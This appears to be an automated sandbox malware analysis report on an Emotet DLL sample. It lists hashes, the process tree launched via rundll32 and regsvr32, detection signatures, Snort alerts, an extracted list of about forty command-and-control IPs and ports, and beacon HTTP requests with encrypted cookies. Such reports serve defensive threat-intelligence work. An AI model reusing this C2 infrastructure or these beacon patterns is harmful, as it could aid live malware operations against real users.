Windows Analysis Report
psIFSn7VLi

Overview

General Information

Sample Name: psIFSn7VLi (renamed file extension from none to dll)
Analysis ID: 669356
MD5: 46c0c3d61c9d7de7b0d8e183217a6cc8
SHA1: ce31a65c73c0728e65d5385731d483f7e9f871c2
SHA256: 4533c9dc1c440bf97882358911acf6d3e25ff6b402ca442d752886904f72b786
Tags: 32, dll, exe, trojan

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Changes security center settings (notifications, updates, antivirus, firewall)
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
AV process strings found (often used to terminate AV products)
Modifies existing windows services
PE file contains strange resources
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Connects to several IPs in different countries
Registers a DLL
Queries disk information (often used to detect virtual machines)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 5612 cmdline: loaddll32.exe "C:\Users\user\Desktop\psIFSn7VLi.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 1356 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\psIFSn7VLi.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 2012 cmdline: rundll32.exe "C:\Users\user\Desktop\psIFSn7VLi.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 4864 cmdline: regsvr32.exe /s C:\Users\user\Desktop\psIFSn7VLi.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • regsvr32.exe (PID: 5608 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Arwhu\ttgk.pdy" MD5: 426E7499F6A7346F0410DEAD0805586B)
    • rundll32.exe (PID: 4832 cmdline: rundll32.exe C:\Users\user\Desktop\psIFSn7VLi.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 2372 cmdline: rundll32.exe C:\Users\user\Desktop\psIFSn7VLi.dll,DllUnregisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • svchost.exe (PID: 4288 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5648 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5764 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5980 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3764 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 4656 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 6128 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 3716 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 3388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 2344 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6048 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6260 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6388 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6672 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7060 cmdline: c:\windows\system32\svchost.exe -k localservice -s W32Time MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup
Source | Rule | Description | Author
00000004.00000002.247001370.0000000004231000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000004.00000002.247001370.0000000004231000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
00000006.00000002.762864021.0000000004591000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000006.00000002.762864021.0000000004591000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
00000004.00000002.246952927.0000000002940000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
(11 entries in total; first 5 shown)

Source | Rule | Description | Author
2.2.regsvr32.exe.4df0000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
2.2.regsvr32.exe.4df0000.1.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
3.2.rundll32.exe.4f10000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
3.2.rundll32.exe.4f10000.1.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
6.2.regsvr32.exe.4590000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
(19 entries in total; first 5 shown)
                      No Sigma rule has matched
Timestamp: 07/20/22-00:21:19.660167
Source IP: 192.168.2.4
Destination IP: 46.55.222.11
SID: 2404334
Source Port: 49863
Destination Port: 443
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 07/20/22-00:22:59.973972
Source IP: 192.168.2.4
Destination IP: 131.100.24.231
SID: 2404306
Source Port: 49872
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 07/20/22-00:19:39.513193
Source IP: 192.168.2.4
Destination IP: 51.91.76.89
SID: 2404338
Source Port: 49760
Destination Port: 8080
Protocol: TCP
Classtype: A Network Trojan was detected


                      AV Detection

Source: psIFSn7VLi.dll | Virustotal: Detection: 63%
Source: https://51.91.7.5/ | Virustotal: Detection: 16%
Source: 00000006.00000003.410808194.0000000002BDF000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Emotet {"C2 list": ["129.232.188.93:443", "209.250.246.206:443", "138.185.72.26:8080", "119.193.124.41:7080", "103.75.201.2:443", "5.9.116.246:8080", "203.114.109.124:443", "101.50.0.91:8080", "146.59.226.45:443", "216.158.226.206:443", "189.126.111.200:7080", "50.116.54.215:443", "212.24.98.99:8080", "158.69.222.101:443", "151.106.112.196:8080", "176.56.128.118:443", "103.43.46.182:443", "167.99.115.35:8080", "209.126.98.206:8080", "45.142.114.231:8080", "72.15.201.15:8080", "103.75.201.4:443", "207.38.84.195:8080", "51.254.140.238:7080", "212.237.17.99:8080", "45.118.115.99:8080", "110.232.117.186:8080", "188.44.20.25:443", "178.79.147.66:8080", "217.182.25.250:8080", "173.212.193.249:8080", "1.234.21.73:7080", "45.118.135.203:7080", "185.8.212.130:7080", "195.154.133.20:443", "197.242.150.244:8080", "164.68.99.3:8080", "107.182.225.142:8080", "196.218.30.83:443", "1.234.2.232:8080", "82.165.152.127:8080"]}
Source: psIFSn7VLi.dll | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
Source: unknown | HTTPS traffic detected: 149.56.128.192:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 46.55.222.11:443 -> 192.168.2.4:49863 version: TLS 1.2

                      Networking

Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 149.56.128.192 443
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 185.157.82.211 8080
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 79.172.212.216 8080
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 131.100.24.231 80
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 46.55.222.11 443
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 51.91.76.89 8080
Source: C:\Windows\System32\svchost.exe | Domain query: time.windows.com
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 173.254.208.91 8080
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 160.16.218.63 8080
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 206.188.212.92 8080
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 192.99.251.50 443
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 51.91.7.5 8080
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 159.8.59.82 8080
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 120.50.40.183 80
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 58.227.42.236 80
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 103.221.221.247 8080
Source: Traffic | Snort IDS: 2404338 ET CNC Feodo Tracker Reported CnC Server TCP group 20 192.168.2.4:49760 -> 51.91.76.89:8080
Source: Traffic | Snort IDS: 2404334 ET CNC Feodo Tracker Reported CnC Server TCP group 18 192.168.2.4:49863 -> 46.55.222.11:443
Source: Traffic | Snort IDS: 2404306 ET CNC Feodo Tracker Reported CnC Server TCP group 4 192.168.2.4:49872 -> 131.100.24.231:80
Source: Joe Sandbox View | ASN Name: OVHFR OVHFR
Source: Joe Sandbox View | ASN Name: SZERVERPLEXHU SZERVERPLEXHU
Source: Joe Sandbox View | JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: global traffic | HTTP traffic detected:
GET /SSYKvnZUOEUlRtjgPVsscjkUTaNTgTQQvJUHkyX HTTP/1.1
Cookie: wd=CeWC3bvXPYw6ceEYgfvGdLYPTo0VXwyjQM1b37/spkNB3CGw86NzMzKf1AUGnAmmtW/OWNjKbUC9gyl1OQsrdyfP5xbn01or99X72cgyaEexWqMXtNXm3BOHAyBwYk6TnEAF0q3TMdibHcQhcNNo6Sm9GxBDPs+KnKkOdOQZ76tbXnfftFwj68x6LE4gFCEnmcMMTNEuYiAXbOCL+S+FsI+fnIMfAI5oXYW5JqiwY3vIUlQBUwfTw48YkmxLCfsNjgx6F20LQV3Hnux9vPTgtjjTh1sYYnbNkqrHAkwHKUzWJuie4H3uJ+0/v2jViJz29FfNeDiPeJZqmSc76S+b
Host: 149.56.128.192
Connection: Keep-Alive
Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
GET /TBwKHjQjVeCWIQFS HTTP/1.1
Cookie: TzD=CeWC3bvXPYw6ceEYgfvGdLYPTo0VXwyjQM1b37/spkNB3CGw86NzMzKf1AUGnAmmtW/OWNjKbUC9gyl1OQsrdyfP5xbn01or99X72cgyaEexWqMXtNXm3BOHAyBwYk6TnEAF0q3TMdibHcQhcNNo6Sm9GxBDPs+KnKkOdOQZ76tbXnfftFwj68x6LE4gFCEnmcMMTNEuYiAXbOCL+S+FsI9Ih3e+pR2YRWgAeau9SKu/amPhx+vBX8EeVceLhJI1Cl5c/CGgAhr7yQ63yo30L73FGkUea/TvEpxNO3PjqOskzZcORWqX5SDpz1exfeePjzjvPRMWMpzyGCnmStacLsD4YfqerzQ/buYpgMei8ILwW16H6ENPPQ==
Host: 46.55.222.11
Connection: Keep-Alive
Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 217.182.25.250 217.182.25.250
Source: Joe Sandbox View | IP Address: 79.172.212.216 79.172.212.216
Source: global traffic | TCP traffic: 192.168.2.4:49760 -> 51.91.76.89:8080
Source: global traffic | TCP traffic: 192.168.2.4:49761 -> 173.254.208.91:8080
Source: global traffic | TCP traffic: 192.168.2.4:49829 -> 160.16.218.63:8080
Source: global traffic | TCP traffic: 192.168.2.4:49858 -> 206.188.212.92:8080
Source: global traffic | TCP traffic: 192.168.2.4:49864 -> 79.172.212.216:8080
Source: global traffic | TCP traffic: 192.168.2.4:49865 -> 103.221.221.247:8080
Source: global traffic | TCP traffic: 192.168.2.4:49868 -> 185.157.82.211:8080
Source: global traffic | TCP traffic: 192.168.2.4:49869 -> 159.8.59.82:8080
Source: global traffic | TCP traffic: 192.168.2.4:49870 -> 51.91.7.5:8080
Source: unknown | Network traffic detected: IP country count 26
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown | Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown | Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49867
Source: global traffic | HTTP traffic detected:
HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 19 Jul 2022 22:21:19 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
                      Source: svchost.exe, 00000017.00000003.375394454.0000015C8A76F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG",
 equals www.facebook.com (Facebook)
                      Source: svchost.exe, 00000017.00000003.375394454.0000015C8A76F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG",
 equals www.twitter.com (Twitter)
                      Source: svchost.exe, 00000017.00000003.375394454.0000015C8A76F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.375413420.0000015C8A780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX",
"SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-07-11T16:37:37.4991749Z||.||58dfb4d5-be7e-424e-8739-cac99224843f||1152921505695035586||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                      Source: regsvr32.exe, 00000006.00000003.364680383.0000000002C31000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.665412089.000001697FE63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.421711170.0000015C8A700000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: svchost.exe, 00000014.00000002.665412089.000001697FE63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.421495587.0000015C89EEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                      Source: regsvr32.exe, 00000006.00000003.728308506.0000000002C73000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762712850.0000000002C73000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.6.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: regsvr32.exe, 00000006.00000003.723777902.0000000004EBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?75939ced2d84a
                      Source: regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en;T
                      Source: svchost.exe, 00000017.00000003.396728134.0000015C8A792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://help.disneyplus.com.
                      Source: svchost.exe, 0000000E.00000002.314090796.000001ECDFA13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
                      Source: svchost.exe, 0000000C.00000002.762160897.00000276B2E44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                      Source: svchost.exe, 0000000C.00000002.762160897.00000276B2E44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.xboxlive.com
                      Source: regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://103.221.221.247/
                      Source: regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://103.221.221.247/Certificates
                      Source: regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://103.221.221.247/Global
                      Source: regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://103.221.221.247:8080/
                      Source: regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://103.221.221.247:8080/PosEzINMiHgCPAexqpnbXngfJaZeCEEsiTgLE
                      Source: regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://103.221.221.247:8080/PosEzINMiHgCPAexqpnbXngfJaZeCEEsiTgLE3062332-1002
                      Source: regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://103.221.221.247:8080/PosEzINMiHgCPAexqpnbXngfJaZeCEEsiTgLEr
                      Source: regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://103.221.221.247:8080/i
                      Source: regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://120.50.40.183/
                      Source: regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://120.50.40.183/d
                      Source: regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://120.50.40.183/m
                      Source: regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://120.50.40.183/rosoft
